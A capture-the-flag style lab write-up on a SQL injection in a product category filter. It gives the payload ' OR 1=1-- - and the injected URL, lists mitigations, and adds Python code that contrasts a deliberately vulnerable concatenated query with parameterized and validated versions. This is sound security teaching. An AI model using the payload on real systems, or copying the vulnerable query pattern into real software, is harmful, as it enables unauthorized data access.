# Level 1: SQL injection vulnerability in WHERE clause allowing retrieval of hidden data

## <mark style="color:purple;">Objective</mark>

This lab contains a SQL injection vulnerability in the product category filter. When a user selects a category, the application performs a SQL query similar to:

```sql
SELECT * FROM products WHERE category = 'Gifts' AND released = 1
```

To solve the lab, perform a SQL injection attack that causes the application to display one or more unreleased products.

## <mark style="color:purple;">Explanation</mark>

The application dynamically builds SQL queries based on user input without proper sanitization. This creates an opportunity to inject malicious SQL code into the `category` parameter. By altering the query logic, we can bypass the intended filter that limits results to only released products and retrieve hidden (unreleased) entries from the database.

## <mark style="color:purple;">Resolution</mark>

1. Access any product category from the main page.
2. Observe the URL structure, which includes a query parameter:

   ```
   /filter?category=Accessories
   ```
3. Replace the `Accessories` value with the following SQL payload:

   ```sql
   ' OR 1=1-- -
   ```
4. The full URL becomes:

   ```
   /filter?category=' OR 1=1-- -
   ```
5. This injection modifies the query as follows:

   ```sql
   SELECT * FROM products WHERE category = '' OR 1=1-- -' AND released = 1
   ```

   The injected `'` closes the category string, and `OR 1=1` makes the `WHERE` condition true for every row regardless of category. The `-- -` sequence comments out the remainder of the query, so the `AND released = 1` condition is never evaluated. As a result, both the category filter and the released filter are bypassed, and all released and unreleased products are displayed.
6. If the application reveals at least one unreleased product, the lab is solved.

<figure><img src="https://lh7-rt.googleusercontent.com/docsz/AD_4nXfOvOzUGuoku3EgXW1Hiw3dnF2HV6nCNJNCcVVrXQdX9JbPQsmovy1tDuwW04LQ5tqXBuDFO99OzvEtMqccBNkoCTfiBwQBNN09SHbVzpcWzcWTxbKL0EIhgUxOFR4fF3c4LFxR?key=Ca0b02oypcOIWxBvXZ_03UM1" alt="" width="375"><figcaption></figcaption></figure>

## <mark style="color:purple;">Mitigation</mark>

To prevent SQL injection vulnerabilities like this, applications should:

* Use **parameterized queries (prepared statements)** instead of dynamically constructing SQL with user input.
* Implement **server-side input validation and sanitization**.
* Apply the principle of **least privilege** to database accounts.
* Monitor logs for unexpected SQL behavior or anomalies.
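The following added example (not part of the original lab or its application) contrasts the lab's vulnerable string-building pattern with a parameterized query and an allowlist check, using a constructed in-memory SQLite table that stands in for the `products` table:

```python
import sqlite3

# Constructed sample rows standing in for the lab's products table (not the lab's real data).
PRODUCTS = [
    ("Gift Voucher", "Gifts", 1),
    ("Secret Gadget", "Gifts", 0),           # unreleased: must stay hidden
    ("Phone Case", "Accessories", 1),
    ("Prototype Watch", "Accessories", 0),   # unreleased: must stay hidden
]
KNOWN_CATEGORIES = {"Gifts", "Accessories"}  # hypothetical allowlist for validation


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (name TEXT, category TEXT, released INTEGER)")
    conn.executemany("INSERT INTO products VALUES (?, ?, ?)", PRODUCTS)
    return conn


def filter_vulnerable(conn, category):
    # The lab's pattern: user input is concatenated straight into the SQL text,
    # so "' OR 1=1-- -" rewrites the query and comments out "AND released = 1".
    sql = f"SELECT name FROM products WHERE category = '{category}' AND released = 1"
    return [row[0] for row in conn.execute(sql)]


def filter_parameterized(conn, category):
    # Mitigation: the value is bound as a parameter and is never parsed as SQL,
    # so the payload is just a category name that matches no row.
    sql = "SELECT name FROM products WHERE category = ? AND released = 1"
    return [row[0] for row in conn.execute(sql, (category,))]


def filter_validated(conn, category):
    # Defence in depth: reject anything outside the known category set before
    # it reaches the database, then still use the parameterized query.
    if category not in KNOWN_CATEGORIES:
        raise ValueError(f"unknown category: {category!r}")
    return filter_parameterized(conn, category)


if __name__ == "__main__":
    db = make_db()
    payload = "' OR 1=1-- -"
    print(filter_vulnerable(db, payload))      # all four names, unreleased included
    print(filter_parameterized(db, payload))   # []
```

Running the block shows the same payload returning every row through the concatenated query and nothing through the parameterized one.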
